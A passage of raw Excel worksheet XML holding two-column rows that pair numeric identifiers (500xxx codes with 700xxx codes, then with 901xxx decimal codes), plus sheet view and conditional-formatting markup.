    <row r="694" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A694" s="3">
        <v>500081</v>
      </c>
      <c r="B694" s="3">
        <v>700387</v>
      </c>
    </row>
    <row r="695" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A695" s="3">
        <v>500081</v>
      </c>
      <c r="B695" s="3">
        <v>700012</v>
      </c>
    </row>
    <row r="696" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A696" s="3">
        <v>500081</v>
      </c>
      <c r="B696" s="3">
        <v>700596</v>
      </c>
    </row>
    <row r="697" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A697" s="3">
        <v>500081</v>
      </c>
      <c r="B697" s="3">
        <v>700452</v>
      </c>
    </row>
    <row r="698" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A698" s="3">
        <v>500081</v>
      </c>
      <c r="B698" s="3">
        <v>700388</v>
      </c>
    </row>
    <row r="699" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A699" s="3">
        <v>500010</v>
      </c>
      <c r="B699" s="3">
        <v>700099</v>
      </c>
    </row>
    <row r="700" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A700" s="3">
        <v>500010</v>
      </c>
      <c r="B700" s="3">
        <v>700335</v>
      </c>
    </row>
    <row r="701" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A701" s="3">
        <v>500010</v>
      </c>
      <c r="B701" s="3">
        <v>700160</v>
      </c>
    </row>
    <row r="702" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A702" s="3">
        <v>500010</v>
      </c>
      <c r="B702" s="3">
        <v>700126</v>
      </c>
    </row>
    <row r="703" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A703" s="3">
        <v>500010</v>
      </c>
      <c r="B703" s="3">
        <v>700538</v>
      </c>
    </row>
    <row r="704" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A704" s="3">
        <v>500010</v>
      </c>
      <c r="B704" s="3">
        <v>700363</v>
      </c>
    </row>
    <row r="705" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A705" s="3">
        <v>500010</v>
      </c>
      <c r="B705" s="3">
        <v>700091</v>
      </c>
    </row>
    <row r="706" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A706" s="3">
        <v>500010</v>
      </c>
      <c r="B706" s="3">
        <v>700168</v>
      </c>
    </row>
    <row r="707" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A707" s="3">
        <v>500010</v>
      </c>
      <c r="B707" s="3">
        <v>700537</v>
      </c>
    </row>
    <row r="708" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A708" s="3">
        <v>500010</v>
      </c>
      <c r="B708" s="3">
        <v>700581</v>
      </c>
    </row>
    <row r="709" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A709" s="3">
        <v>500010</v>
      </c>
      <c r="B709" s="3">
        <v>700265</v>
      </c>
    </row>
    <row r="710" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A710" s="3">
        <v>500010</v>
      </c>
      <c r="B710" s="3">
        <v>700395</v>
      </c>
    </row>
    <row r="711" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A711" s="3">
        <v>500010</v>
      </c>
      <c r="B711" s="3">
        <v>700002</v>
      </c>
    </row>
    <row r="712" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A712" s="3">
        <v>500010</v>
      </c>
      <c r="B712" s="3">
        <v>700256</v>
      </c>
    </row>
    <row r="713" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A713" s="3">
        <v>500010</v>
      </c>
      <c r="B713" s="3">
        <v>700590</v>
      </c>
    </row>
    <row r="714" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A714" s="3">
        <v>500010</v>
      </c>
      <c r="B714" s="3">
        <v>700102</v>
      </c>
    </row>
    <row r="715" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A715" s="3">
        <v>500010</v>
      </c>
      <c r="B715" s="3">
        <v>700039</v>
      </c>
    </row>
    <row r="716" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A716" s="3">
        <v>500010</v>
      </c>
      <c r="B716" s="3">
        <v>700104</v>
      </c>
    </row>
    <row r="717" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A717" s="3">
        <v>500010</v>
      </c>
      <c r="B717" s="3">
        <v>700587</v>
      </c>
    </row>
    <row r="718" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A718" s="3">
        <v>500010</v>
      </c>
      <c r="B718" s="3">
        <v>700393</v>
      </c>
    </row>
    <row r="719" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A719" s="3">
        <v>500010</v>
      </c>
      <c r="B719" s="3">
        <v>700029</v>
      </c>
    </row>
    <row r="720" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A720" s="3">
        <v>500010</v>
      </c>
      <c r="B720" s="3">
        <v>700075</v>
      </c>
    </row>
    <row r="721" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A721" s="3">
        <v>500010</v>
      </c>
      <c r="B721" s="3">
        <v>700096</v>
      </c>
    </row>
    <row r="722" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A722" s="3">
        <v>500010</v>
      </c>
      <c r="B722" s="3">
        <v>700057</v>
      </c>
    </row>
    <row r="723" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A723" s="3">
        <v>500010</v>
      </c>
      <c r="B723" s="3">
        <v>700022</v>
      </c>
    </row>
    <row r="724" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A724" s="3">
        <v>500123</v>
      </c>
      <c r="B724" s="3">
        <v>700572</v>
      </c>
    </row>
    <row r="725" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A725" s="3">
        <v>500123</v>
      </c>
      <c r="B725" s="3">
        <v>700569</v>
      </c>
    </row>
    <row r="726" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A726" s="3">
        <v>500107</v>
      </c>
      <c r="B726" s="3">
        <v>700002</v>
      </c>
    </row>
    <row r="727" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A727" s="3">
        <v>500124</v>
      </c>
      <c r="B727" s="3">
        <v>700377</v>
      </c>
    </row>
    <row r="728" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A728" s="3">
        <v>500112</v>
      </c>
      <c r="B728" s="3">
        <v>700466</v>
      </c>
    </row>
    <row r="729" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A729" s="3">
        <v>500044</v>
      </c>
      <c r="B729" s="3">
        <v>700501</v>
      </c>
    </row>
    <row r="730" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A730" s="3">
        <v>500044</v>
      </c>
      <c r="B730" s="3">
        <v>700141</v>
      </c>
    </row>
    <row r="731" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A731" s="3">
        <v>500090</v>
      </c>
      <c r="B731" s="3">
        <v>700363</v>
      </c>
    </row>
    <row r="732" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A732" s="3">
        <v>500102</v>
      </c>
      <c r="B732" s="3">
        <v>700552</v>
      </c>
    </row>
    <row r="733" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A733" s="3">
        <v>500102</v>
      </c>
      <c r="B733" s="3">
        <v>700534</v>
      </c>
    </row>
    <row r="734" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A734" s="3">
        <v>500102</v>
      </c>
      <c r="B734" s="3">
        <v>700521</v>
      </c>
    </row>
    <row r="735" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A735" s="3">
        <v>500102</v>
      </c>
      <c r="B735" s="3">
        <v>700154</v>
      </c>
    </row>
    <row r="736" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A736" s="3">
        <v>500102</v>
      </c>
      <c r="B736" s="3">
        <v>700575</v>
      </c>
    </row>
    <row r="737" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A737" s="3">
        <v>500102</v>
      </c>
      <c r="B737" s="3">
        <v>700024</v>
      </c>
    </row>
    <row r="738" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A738" s="3">
        <v>500102</v>
      </c>
      <c r="B738" s="3">
        <v>700367</v>
      </c>
    </row>
    <row r="739" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A739" s="3">
        <v>500102</v>
      </c>
      <c r="B739" s="3">
        <v>700363</v>
      </c>
    </row>
    <row r="740" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A740" s="3">
        <v>500102</v>
      </c>
      <c r="B740" s="3">
        <v>700632</v>
      </c>
    </row>
    <row r="741" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A741" s="3">
        <v>500102</v>
      </c>
      <c r="B741" s="3">
        <v>700002</v>
      </c>
    </row>
    <row r="742" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A742" s="3">
        <v>500102</v>
      </c>
      <c r="B742" s="3">
        <v>700039</v>
      </c>
    </row>
    <row r="743" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A743" s="3">
        <v>500102</v>
      </c>
      <c r="B743" s="3">
        <v>700359</v>
      </c>
    </row>
    <row r="744" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A744" s="3">
        <v>500102</v>
      </c>
      <c r="B744" s="3">
        <v>700097</v>
      </c>
    </row>
    <row r="745" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A745" s="3">
        <v>500102</v>
      </c>
      <c r="B745" s="3">
        <v>700029</v>
      </c>
    </row>
    <row r="746" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A746" s="3">
        <v>500102</v>
      </c>
      <c r="B746" s="3">
        <v>700446</v>
      </c>
    </row>
    <row r="747" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A747" s="3">
        <v>500102</v>
      </c>
      <c r="B747" s="3">
        <v>700266</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="1" type="noConversion"/>
  <conditionalFormatting sqref="E2:E747">
    <cfRule type="duplicateValues" dxfId="6"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12349-C1EE-47FB-8B66-623382312A81}">
  <dimension ref="A1:B2687"/>
  <sheetViews>
    <sheetView topLeftCell="A2673" workbookViewId="0">
      <selection activeCell="G2682" sqref="G2682"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1" s="3" t="s">
        <v>8</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="2" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A2" s="5">
        <v>500018</v>
      </c>
      <c r="B2" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="3" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A3" s="5">
        <v>500018</v>
      </c>
      <c r="B3" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="4" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A4" s="5">
        <v>500018</v>
      </c>
      <c r="B4" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="5" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A5" s="5">
        <v>500018</v>
      </c>
      <c r="B5" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="6" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A6" s="5">
        <v>500018</v>
      </c>
      <c r="B6" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="7" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A7" s="5">
        <v>500018</v>
      </c>
      <c r="B7" s="3">
        <v>901069.00100000005</v>
      </c>
    </row>
    <row r="8" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A8" s="5">
        <v>500018</v>
      </c>
      <c r="B8" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="9" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A9" s="5">
        <v>500018</v>
      </c>
      <c r="B9" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="10" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A10" s="5">
        <v>500018</v>
      </c>
      <c r="B10" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="11" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A11" s="5">
        <v>500018</v>
      </c>
      <c r="B11" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="12" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A12" s="5">
        <v>500018</v>
      </c>
      <c r="B12" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="13" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A13" s="5">
        <v>500018</v>
      </c>
      <c r="B13" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="14" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A14" s="5">
        <v>500130</v>
      </c>
      <c r="B14" s="3">
        <v>901555.00300000003</v>
      </c>
    </row>
    <row r="15" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A15" s="5">
        <v>500130</v>
      </c>
      <c r="B15" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="16" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A16" s="5">
        <v>500130</v>
      </c>
      <c r="B16" s="3">
        <v>901056.00100000005</v>
      </c>
    </row>
    <row r="17" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A17" s="5">
        <v>500130</v>
      </c>
      <c r="B17" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="18" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A18" s="5">
        <v>500130</v>
      </c>
      <c r="B18" s="3">
        <v>901566.00300000003</v>
      </c>
    </row>
    <row r="19" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A19" s="5">
        <v>500130</v>
      </c>
      <c r="B19" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="20" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A20" s="5">
        <v>500138</v>
      </c>
      <c r="B20" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="21" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A21" s="5">
        <v>500138</v>
      </c>
      <c r="B21" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="22" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A22" s="5">
        <v>500138</v>
      </c>
      <c r="B22" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="23" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A23" s="5">
        <v>500138</v>
      </c>
      <c r="B23" s="3">
        <v>901592.00199999998</v>
      </c>
    </row>
    <row r="24" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A24" s="5">
        <v>500138</v>
      </c>
      <c r="B24" s="3">
        <v>901590.005</v>
      </c>
    </row>
    <row r="25" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A25" s="5">
        <v>500138</v>
      </c>
      <c r="B25" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="26" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A26" s="5">
        <v>500138</v>
      </c>
      <c r="B26" s="3">
        <v>901027.00300000003</v>
      </c>
    </row>
    <row r="27" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A27" s="5">
        <v>500138</v>
      </c>
      <c r="B27" s="3">
        <v>901588.00100000005</v>
      </c>
    </row>
    <row r="28" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A28" s="5">
        <v>500138</v>
      </c>
      <c r="B28" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="29" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A29" s="5">
        <v>500138</v>
      </c>
      <c r="B29" s="3">
        <v>901507</v>
      </c>
    </row>
    <row r="30" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A30" s="5">
        <v>500138</v>
      </c>
      <c r="B30" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="31" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A31" s="5">
        <v>500138</v>
      </c>
      <c r="B31" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="32" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A32" s="5">
        <v>500099</v>
      </c>
      <c r="B32" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="33" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A33" s="5">
        <v>500099</v>
      </c>
      <c r="B33" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="34" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A34" s="5">
        <v>500099</v>
      </c>
      <c r="B34" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="35" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A35" s="5">
        <v>500099</v>
      </c>
      <c r="B35" s="3">
        <v>901571</v>
      </c>
    </row>
    <row r="36" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A36" s="5">
        <v>500099</v>
      </c>
      <c r="B36" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="37" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A37" s="5">
        <v>500099</v>
      </c>
      <c r="B37" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="38" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A38" s="5">
        <v>500099</v>
      </c>
      <c r="B38" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="39" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A39" s="5">
        <v>500099</v>
      </c>
      <c r="B39" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="40" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A40" s="5">
        <v>500099</v>
      </c>
      <c r="B40" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="41" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A41" s="5">
        <v>500006</v>
      </c>
      <c r="B41" s="3">
        <v>901087.00100000005</v>
      </c>
    </row>
    <row r="42" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A42" s="5">
        <v>500006</v>
      </c>
      <c r="B42" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="43" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A43" s="5">
        <v>500006</v>
      </c>
      <c r="B43" s="3">
        <v>901560.00100000005</v>
      </c>
    </row>
    <row r="44" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A44" s="5">
        <v>500006</v>
      </c>
      <c r="B44" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="45" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A45" s="5">
        <v>500006</v>
      </c>
      <c r="B45" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="46" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A46" s="5">
        <v>500006</v>
      </c>
      <c r="B46" s="3">
        <v>901584.00100000005</v>
      </c>
    </row>
    <row r="47" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A47" s="5">
        <v>500006</v>
      </c>
      <c r="B47" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="48" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A48" s="5">
        <v>500006</v>
      </c>
      <c r="B48" s="3">
        <v>901114.00100000005</v>
      </c>
    </row>
    <row r="49" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A49" s="5">
        <v>500006</v>
      </c>
      <c r="B49" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="50" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A50" s="5">
        <v>500006</v>
      </c>
      <c r="B50" s="3">
        <v>901585.00199999998</v>
      </c>
    </row>
    <row r="51" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A51" s="5">
        <v>500006</v>
      </c>
      <c r="B51" s="3">
        <v>901036.005</v>
      </c>
    </row>
    <row r="52" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A52" s="5">
        <v>500006</v>
      </c>
      <c r="B52" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="53" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A53" s="5">
        <v>500006</v>
      </c>
      <c r="B53" s="3">
        <v>901588.00100000005</v>
      </c>
    </row>
    <row r="54" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A54" s="5">
        <v>500006</v>
      </c>
      <c r="B54" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="55" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A55" s="5">
        <v>500006</v>
      </c>
      <c r="B55" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="56" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A56" s="5">
        <v>500006</v>
      </c>
      <c r="B56" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="57" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A57" s="5">
        <v>500006</v>
      </c>
      <c r="B57" s="3">
        <v>901566.00199999998</v>
      </c>
    </row>
    <row r="58" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A58" s="5">
        <v>500006</v>
      </c>
      <c r="B58" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="59" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A59" s="5">
        <v>500006</v>
      </c>
      <c r="B59" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="60" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A60" s="5">
        <v>500006</v>
      </c>
      <c r="B60" s="3">
        <v>901049</v>
      </c>
    </row>
    <row r="61" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A61" s="5">
        <v>500006</v>
      </c>
      <c r="B61" s="3">
        <v>901007</v>
      </c>
    </row>
    <row r="62" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A62" s="5">
        <v>500006</v>
      </c>
      <c r="B62" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="63" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A63" s="5">
        <v>500005</v>
      </c>
      <c r="B63" s="3">
        <v>901568.00300000003</v>
      </c>
    </row>
    <row r="64" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A64" s="5">
        <v>500005</v>
      </c>
      <c r="B64" s="3">
        <v>901203</v>
      </c>
    </row>
    <row r="65" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A65" s="5">
        <v>500005</v>
      </c>
      <c r="B65" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="66" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A66" s="5">
        <v>500005</v>
      </c>
      <c r="B66" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="67" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A67" s="5">
        <v>500005</v>
      </c>
      <c r="B67" s="3">
        <v>901102.00199999998</v>
      </c>
    </row>
    <row r="68" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A68" s="5">
        <v>500025</v>
      </c>
      <c r="B68" s="3">
        <v>901583.00600000005</v>
      </c>
    </row>
    <row r="69" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A69" s="5">
        <v>500025</v>
      </c>
      <c r="B69" s="3">
        <v>901585.00199999998</v>
      </c>
    </row>
    <row r="70" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A70" s="5">
        <v>500026</v>
      </c>
      <c r="B70" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="71" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A71" s="5">
        <v>500026</v>
      </c>
      <c r="B71" s="3">
        <v>901071.00399999996</v>
      </c>
    </row>
    <row r="72" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A72" s="5">
        <v>500026</v>
      </c>
      <c r="B72" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="73" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A73" s="5">
        <v>500026</v>
      </c>
      <c r="B73" s="3">
        <v>901059.00300000003</v>
      </c>
    </row>
    <row r="74" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A74" s="5">
        <v>500026</v>
      </c>
      <c r="B74" s="3">
        <v>901133</v>
      </c>
    </row>
    <row r="75" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A75" s="5">
        <v>500026</v>
      </c>
      <c r="B75" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="76" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A76" s="5">
        <v>500026</v>
      </c>
      <c r="B76" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="77" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A77" s="5">
        <v>500026</v>
      </c>
      <c r="B77" s="3">
        <v>901105</v>
      </c>
    </row>
    <row r="78" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A78" s="5">
        <v>500026</v>
      </c>
      <c r="B78" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="79" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A79" s="5">
        <v>500026</v>
      </c>
      <c r="B79" s="3">
        <v>901053.00199999998</v>
      </c>
    </row>
    <row r="80" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A80" s="5">
        <v>500026</v>
      </c>
      <c r="B80" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="81" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A81" s="5">
        <v>500026</v>
      </c>
      <c r="B81" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="82" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A82" s="5">
        <v>500073</v>
      </c>
      <c r="B82" s="3">
        <v>901071.00100000005</v>
      </c>
    </row>
    <row r="83" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A83" s="5">
        <v>500073</v>
      </c>
      <c r="B83" s="3">
        <v>901547.00100000005</v>
      </c>
    </row>
    <row r="84" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A84" s="5">
        <v>500073</v>
      </c>
      <c r="B84" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="85" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A85" s="5">
        <v>500073</v>
      </c>
      <c r="B85" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="86" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A86" s="5">
        <v>500073</v>
      </c>
      <c r="B86" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="87" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A87" s="5">
        <v>500073</v>
      </c>
      <c r="B87" s="3">
        <v>901132.00100000005</v>
      </c>
    </row>
    <row r="88" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A88" s="5">
        <v>500073</v>
      </c>
      <c r="B88" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="89" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A89" s="5">
        <v>500073</v>
      </c>
      <c r="B89" s="3">
        <v>901189</v>
      </c>
    </row>
    <row r="90" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A90" s="5">
        <v>500073</v>
      </c>
      <c r="B90" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="91" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A91" s="5">
        <v>500073</v>
      </c>
      <c r="B91" s="3">
        <v>901574.00199999998</v>
      </c>
    </row>
    <row r="92" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A92" s="5">
        <v>500073</v>
      </c>
      <c r="B92" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="93" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A93" s="5">
        <v>500073</v>
      </c>
      <c r="B93" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="94" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A94" s="5">
        <v>500073</v>
      </c>
      <c r="B94" s="3">
        <v>901588.00199999998</v>
      </c>
    </row>
    <row r="95" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A95" s="5">
        <v>500073</v>
      </c>
      <c r="B95" s="3">
        <v>901566.00100000005</v>
      </c>
    </row>
    <row r="96" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A96" s="5">
        <v>500073</v>
      </c>
      <c r="B96" s="3">
        <v>901218</v>
      </c>
    </row>
    <row r="97" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A97" s="5">
        <v>500073</v>
      </c>
      <c r="B97" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="98" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A98" s="5">
        <v>500073</v>
      </c>
      <c r="B98" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="99" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A99" s="5">
        <v>500073</v>
      </c>
      <c r="B99" s="3">
        <v>901033</v>
      </c>
    </row>
    <row r="100" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A100" s="5">
        <v>500073</v>
      </c>
      <c r="B100" s="3">
        <v>901204.00199999998</v>
      </c>
    </row>
    <row r="101" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A101" s="5">
        <v>500007</v>
      </c>
      <c r="B101" s="3">
        <v>901134.00100000005</v>
      </c>
    </row>
    <row r="102" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A102" s="5">
        <v>500007</v>
      </c>
      <c r="B102" s="3">
        <v>901098.00199999998</v>
      </c>
    </row>
    <row r="103" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A103" s="5">
        <v>500007</v>
      </c>
      <c r="B103" s="3">
        <v>901583.00100000005</v>
      </c>
    </row>
    <row r="104" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A104" s="5">
        <v>500007</v>
      </c>
      <c r="B104" s="3">
        <v>901595.00199999998</v>
      </c>
    </row>
    <row r="105" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A105" s="5">
        <v>500007</v>
      </c>
